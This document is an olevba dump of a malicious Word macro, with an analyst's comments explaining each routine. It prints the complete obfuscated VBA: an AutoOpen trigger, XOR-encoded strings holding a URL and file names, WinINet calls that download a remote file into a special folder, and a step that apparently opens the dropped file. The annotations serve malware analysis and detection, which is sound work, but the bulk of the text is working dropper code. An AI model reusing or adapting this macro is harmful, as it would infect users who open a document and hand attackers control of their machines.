dynamoo

Malicious Word macro

Apr 7th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- 04.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 04.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 04.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  ' Analyst note: wrapper reached from autoopen; its only action is the call
  ' to CALTHA (defined in the PIDLE0 module further down).
  16. Sub InIn()
  17. CALTHA
  18. End Sub
  19.  
  ' Analyst note: AutoOpen auto-exec entry point (see the ANALYSIS table for
  ' this module) - Word runs it when the document is opened with macros
  ' enabled. It only chains to InIn -> CALTHA; the lowercase spelling is
  ' cosmetic, Word matches the name case-insensitively.
  20. Sub autoopen()
  21. InIn
  22. End Sub
  23.  
  24. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  25. ANALYSIS:
  26. +----------+----------+---------------------------------------+
  27. | Type     | Keyword  | Description                           |
  28. +----------+----------+---------------------------------------+
  29. | AutoExec | AutoOpen | Runs when the Word document is opened |
  30. +----------+----------+---------------------------------------+
  31. -------------------------------------------------------------------------------
  32. VBA MACRO FILE6.bas
  33. in file: 04.doc - OLE stream: u'Macros/VBA/FILE6'
  34. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  35.  
  36. Option Explicit
  ' Analyst note: BRITTANIA is never referenced in the extracted modules
  ' (not to be confused with the function BRITANNIA, one T); likely filler.
  37. Public Const BRITTANIA = "BRITTANY"
  38.  
  39.  
  40.  
  ' BRANDI: size of the fixed-length read buffer in BRENDA and the
  ' lNumBytesToRead value passed to InternetReadFile.
  41. Private Const BRANDI = 8162
  ' BRANDY: passed as sAgent (User-Agent) to InternetOpenA - "HAZ" is a
  ' network artifact worth matching on.
  42. Private Const BRANDY As String = "HAZ"
  ' BREANA: lAccessType argument to InternetOpenA.
  43. Private Const BREANA = 1
  ' BREDA: dwFlags argument to InternetOpenUrlA (&H4000000; appears to be
  ' INTERNET_FLAG_NO_CACHE_WRITE - confirm against wininet.h).
  44. Private Const BREDA = &H4000000
  45.  
  ' Analyst note: download-to-file routine; BREE is the destination path.
  ' Flow: InternetOpenA -> (via BRITANNIA) InternetOpenUrlA on the decoded
  ' URL -> InternetReadFile loop -> Put to a binary file -> close handles.
  ' Returns True whenever a request handle was obtained: BRIONY is then at
  ' least BRANDI, because the first buffer is copied whole (see below).
  46. Public Function BRENDA _
  47. (ByVal BREE As String) As Boolean
  48.     #If VBA7 _
  49.     And Win64 Then
  50.         Dim BRETT As LongPtr, BRIANNA As LongPtr
  51.     #Else
  52.         Dim BRETT As Long, BRIANNA As Long
  53.     #End If
  ' BRIAR: bytes read per call (lNumberOfBytesRead, passed ByRef).
  54.     Dim BRIAR As Long
  ' BRIDGET: fixed-length buffer of BRANDI (8162) characters; BRIELLE: accumulated body.
  55.     Dim BRIDGET As String * BRANDI, BRIELLE As String
  ' BRIER: file number for the output file; BRIONY: length of the received data.
  56.     Dim BRIER As Integer, BRIONY As Double
  ' CAMEO = InternetOpenA; BRANDY ("HAZ") is the User-Agent, BREANA the access type.
  57.     BRETT = CAMEO(BRANDY, BREANA, vbNullString, vbNullString, 0)
  58.     If BRETT = 0 Then
  59.         Exit Function
  60.     End If
  ' FiGaMan is declared but never used.
  61.     Dim FiGaMan As Boolean
  62.    
  ' BRITANNIA opens the URL and stores the request handle in BRIANNA (ByRef).
  ' Its Boolean result is discarded (it always returns True), so success is
  ' judged below by BRIANNA <> 0 instead.
  63.     If BRITANNIA(BRIANNA, BRETT) Then
  64.     End If
  65.     If BRIANNA = 0 Then
  66.         BRIONY = 0
  67.     Else
  ' First InternetReadFile call; the entire 8162-character buffer is copied,
  ' not just the BRIAR bytes actually read, so the dropped file may carry
  ' buffer padding if the first read was short (possible forensic artifact).
  68.         BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR
  69.         BRIELLE = BRIDGET
  ' Read until InternetReadFile reports 0 bytes; later chunks are trimmed to BRIAR.
  70.         Do While BRIAR <> 0
  71.             BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR
  72.            
  ' Junk loop: 6..8 never equals 38, so End is never reached (anti-analysis filler).
  73.             Dim BRITT As Long
  74. For BRITT = 6 To 8
  75. If BRITT = 38 Then End
  76. Next BRITT
  77.            
  78.             BRIELLE = BRIELLE + Mid(BRIDGET, 1, BRIAR)
  79.         Loop
  ' Write the received bytes to BREE as a binary file.
  80.             BRIONY = Len(BRIELLE): BRIER = FreeFile
  81.         Open BREE _
  82.             For Binary Access Write _
  83.         Lock Write _
  84.         As #BRIER
  85.         Put #BRIER, _
  86.                 , BRIELLE
  ' Junk loop, same pattern as above (2..3 never equals 37).
  87.         Dim BRITTA As Double
  88.             For BRITTA = 2 To 3
  89.     If BRITTA = 37 Then End
  90. Next BRITTA
  91.         Close #BRIER
  92.     End If
  ' BRITTANI = InternetCloseHandle, on the request handle then the session handle.
  93.     BRITTANI BRIANNA
  94.     BRITTANI BRETT
  95.     BRIELLE = ""
  96.     If BRIONY Then
  97.         BRENDA = True
  98.     End If
  99. End Function
  100.  
  ' Analyst note: indirection layer - the BRITTNY argument is ignored and the
  ' function only calls BROGAN; no return value is assigned.
  101. Public _
  102. Function BRITTNEY(BRITTNY _
  103. As _
  104. String)
  105. BROGAN
  106. End Function
  ' Analyst note: orchestrator - builds the drop path in a special folder,
  ' calls BRENDA to download into it, then opens the dropped file. Every
  ' ProgID and name is decoded at runtime by BROOK with the key BROOKE; the
  ' decoded strings are not shown in this output (olevba --decode lists them).
  107. Public Function BROGAN()
  108.  
  ' BRONTE: object created from the decoded BROOKLYN string. Its later use of
  ' .FileExists / .DeleteFile / .GetSpecialFolder suggests a file-system
  ' scripting object - confirm from the decoded value.
  109. Dim BRONTE  As Object
  110. Set BRONTE = CreateObject _
  111. (BROOK(BROOKE, BROOKLYN))
  112.  
  ' BRYANNA: GetSpecialFolder(2) on BRONTE (presumably the temporary folder).
  113. Dim BRYANNA As Object
  114. Set BRYANNA = BRYONY(BRONTE)
  115.  
  ' BUFFY: folder & decoded BUNTY = full path of the dropped file.
  116. Dim BUFFY
  117. Dim BUNNY
  118. BUNNY = BROOK(BROOKE, BUNTY)
  119. BUFFY = BRYANNA & BUNNY
  ' Two junk loops whose conditions can never be true (filler).
  120. Dim BURGUNDY As Integer
  121. For BURGUNDY = 6 To 7
  122. If BURGUNDY = 33 Then End
  123. Next BURGUNDY
  124. Dim CADENCE As Integer
  125. For CADENCE = 2 To 3
  126. If CADENCE = 34 Then End
  127. Next CADENCE
  128.  
  ' Remove any earlier copy before downloading.
  129. If CADY(BRONTE, BUFFY) Then
  130. BRONTE. _
  131. DeleteFile BUFFY
  132. End If
  ' Download. The Boolean result and the following existence check are both
  ' ignored, so the Open below is attempted even if the download failed.
  133. If BRENDA(BUFFY) Then
  134. End If
  135. If CADY(BRONTE, BUFFY) Then
  136. End If
  ' CAELIE: second object, from the decoded CAETLIN string; .Open on the
  ' dropped path is presumably the execution step (ProgID not shown here).
  137. Dim CAELIE
  138. Set CAELIE = CreateObject _
  139. (BROOK _
  140. (BROOKE, CAETLIN))
  141. CAELIE.Open BUFFY
  142. End Function
  143.  
  144.  
  ' Analyst note: trivial Len wrapper; BROOK uses it for the hex-string length.
  145. Public Function CANDICE(CANDIDA As String) As Integer
  146. CANDICE = Len(CANDIDA)
  147. End Function
  148.  
  149. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  150. ANALYSIS:
  151. +------------+----------------+-----------------------------------------+
  152. | Type       | Keyword        | Description                             |
  153. +------------+----------------+-----------------------------------------+
  154. | Suspicious | CreateObject   | May create an OLE object                |
  155. | Suspicious | Open           | May open a file                         |
  156. | Suspicious | Write          | May write to a file (if combined with   |
  157. |            |                | Open)                                   |
  158. | Suspicious | Put            | May write to a file (if combined with   |
  159. |            |                | Open)                                   |
  160. | Suspicious | Binary         | May read or write a binary file (if     |
  161. |            |                | combined with Open)                     |
  162. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  163. |            |                | may be used to obfuscate strings        |
  164. |            |                | (option --decode to see all)            |
  165. +------------+----------------+-----------------------------------------+
  166. -------------------------------------------------------------------------------
  167. VBA MACRO PIDLE0.bas
  168. in file: 04.doc - OLE stream: u'Macros/VBA/PIDLE0'
  169. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  170.  
  171.  
  172.  
  ' Analyst note: called from InIn. After a junk loop (44..46 never equals 32)
  ' it calls CALANTHA with 89, a value CALANTHA ignores.
  173. Sub CALTHA()
  174.         Dim CAMELLIA As Long
  175.  
  176.     Dim CANDIS As Double
  177. For CANDIS = 44 To 46
  178. If CANDIS = 32 Then End
  179. Next CANDIS
  180. CAMELLIA = 89
  181. CALANTHA (CAMELLIA)
  182.  
  183. End Sub
  184.  
  185.  
  ' Analyst note: string decoder used for every obfuscated constant.
  ' CAMERON is the key (always BROOKE in this sample), CAMILLA a hex string.
  ' Each hex pair is XORed with one key character; the key index is
  ' (pair_number Mod Len(key)) + 1, so pair 1 pairs with the key's SECOND
  ' character. Reproducing this offline recovers the URL, file name and ProgIDs.
  186. Public Function BROOK(CAMERON As String, CAMILLA As String) As String
  187.    
  188.     Dim CAMILLE As Integer
  189.     Dim CAMMIE As Integer
  190.    
  191.    
  ' Junk loop (1..3 never equals 32).
  192.     Dim CAMRYN As Double
  193. For CAMRYN = 1 To 3
  194. If CAMRYN = 32 Then End
  195. Next CAMRYN
  196.    
  ' CANDACE: hex-pair index; CANDI: decoded output.
  197.     Dim CANDACE As Long
  198.     Dim CANDI As String
  ' One iteration per hex pair (Len / 2 via CANDICE).
  199.     For CANDACE = 1 _
  200.     To _
  201.     ( _
  202.     CANDICE _
  203.     (CAMILLA) _
  204.     / 2)
  ' CAMILLE = value of the current hex pair; CAMMIE = code of the key character.
  205.         CAMILLE = Val("&H" & _
  206.         (Mid$(CAMILLA, _
  207.         (2 * CANDACE) - 1, 2)))
  208.         CAMMIE = Asc(Mid$(CAMERON, _
  209.         ((CANDACE Mod Len(CAMERON)) + 1), 1))
  210.         CANDI = CANDI + Chr(CAMILLE Xor CAMMIE)
  211.     Next CANDACE
  212.    BROOK = CANDI
  213. End Function
  214.  
  215.  
  216. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  217. ANALYSIS:
  218. +------------+---------+-----------------------------------------+
  219. | Type       | Keyword | Description                             |
  220. +------------+---------+-----------------------------------------+
  221. | Suspicious | Chr     | May attempt to obfuscate specific       |
  222. |            |         | strings                                 |
  223. | Suspicious | Xor     | May attempt to obfuscate specific       |
  224. |            |         | strings                                 |
  225. +------------+---------+-----------------------------------------+
  226. -------------------------------------------------------------------------------
  227. VBA MACRO IDL4.bas
  228. in file: 04.doc - OLE stream: u'Macros/VBA/IDL4'
  229. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  230.  
  231.  
  ' Analyst note: hex-encoded strings decoded at runtime by BROOK with the key
  ' BROOKE. Usage in this sample: CAETLIN -> ProgID of the object that Opens
  ' the dropped file (BROGAN); BUNTY -> dropped file name (BROGAN);
  ' CAITLYN -> URL passed to InternetOpenUrlA (BRITANNIA); BROOKLYN -> ProgID
  ' of the file-handling object (BROGAN). The decoded values are not part of
  ' this output (see "option --decode" in the ANALYSIS table).
  232. Public Const CAETLIN = "635A5C555F1E7049425C5A5159405C595C"
  233. Public Const BUNTY = "6C40565B4643450B1C01521C5D4C50"
  234. Public Const CAITLYN = "58464D49091F1E5B5747525957591B5257170301021F050C1C524D57"
  235. Public Const BROOKLYN = "63514B5043445857551E755B5451664F414C545E7D5259515143"
  236. Public Const BROOKE = "1029930192032845628132034275236"
  237.  
  238.  
  239.  
  240.  
  ' Analyst note: WinINet imports under renamed VBA names. The Alias clause
  ' keeps the real export names in the stream, which is what the "IOC
  ' wininet.dll" row and string-based detections key on. Mapping:
  ' BRITTANI = InternetCloseHandle, CAMEO = InternetOpenA,
  ' BRITNEY = InternetReadFile, CALLIE = InternetOpenUrlA.
  ' BRITTANI declares hInet ByRef, so what reaches the API is the address of
  ' the handle variable rather than the handle value - behaviour unverified.
  241. #If VBA7 And Win64 Then
  242. Public Declare PtrSafe Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
  243. Public Declare PtrSafe Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
  244. Public Declare PtrSafe Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As LongPtr, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  245. Public Declare PtrSafe Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
  246. #Else
  247. Public Declare Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
  248. Public Declare Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
  249. Public Declare Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As Long, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  250. Public Declare Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
  251. #End If
  252.  
  253.  
  ' Analyst note: returns CALANTHE.GetSpecialFolder(2). On a file-system
  ' scripting object that is the temporary folder - confirm from the decoded
  ' ProgID used to create CALANTHE.
  254. Public Function BRYONY(ByRef CALANTHE As Object) As Object
  255. Set BRYONY = CALANTHE.GetSpecialFolder(2)
  256. End Function
  ' Analyst note: CALEIGH is ignored, and the literal "CALANTHIA" passed to
  ' BRITTNEY is ignored there as well - call-chain padding down to BROGAN.
  257. Sub CALANTHA(CALEIGH As Long)
  258.  
  259. BRITTNEY ("CALANTHIA")
  260. End Sub
  261.  
  262.  
  263.  
  ' Analyst note: FileExists wrapper on the passed object (CAILEIGH), for
  ' the path CAILYN.
  264. Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
  265. If CAILEIGH.FileExists(CAILYN) Then
  266. CADY = True
  267. Else
  268. CADY = False
  269. End If
  270. End Function
  ' Analyst note: opens the download URL. The URL is decoded on the fly from
  ' CAITLYN; CALLA is the InternetOpenA session handle, and the request
  ' handle returned by CALLIE (InternetOpenUrlA, flags = BREDA) is stored
  ' into CALIDA (ByRef). The function returns True unconditionally, even
  ' when CALLIE returns 0 - the caller BRENDA therefore tests CALIDA = 0.
  271. #If VBA7 _
  272.     And Win64 Then
  273.        Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
  274.     #Else
  275.        Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean
  276.     #End If
  277. Dim CALLIDORA As String
  278.     CALLIDORA = BROOK(BROOKE, CAITLYN)
  279.    
  280.                 CALIDA _
  281.     = CALLIE _
  282.     ( _
  283.     CALLA, _
  284.     CALLIDORA, vbNullString, _
  285.     0, _
  286.     BREDA, 0)
  287.     BRITANNIA = True
  288. End Function
  289.  
  290.  
  291. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  292. ANALYSIS:
  293. +------------+----------------+-----------------------------------------+
  294. | Type       | Keyword        | Description                             |
  295. +------------+----------------+-----------------------------------------+
  296. | Suspicious | Lib            | May run code from a DLL                 |
  297. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  298. |            |                | be used to obfuscate strings (option    |
  299. |            |                | --decode to see all)                    |
  300. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  301. |            |                | may be used to obfuscate strings        |
  302. |            |                | (option --decode to see all)            |
  303. | IOC        | wininet.dll    | Executable file name                    |
  304. +------------+----------------+-----------------------------------------+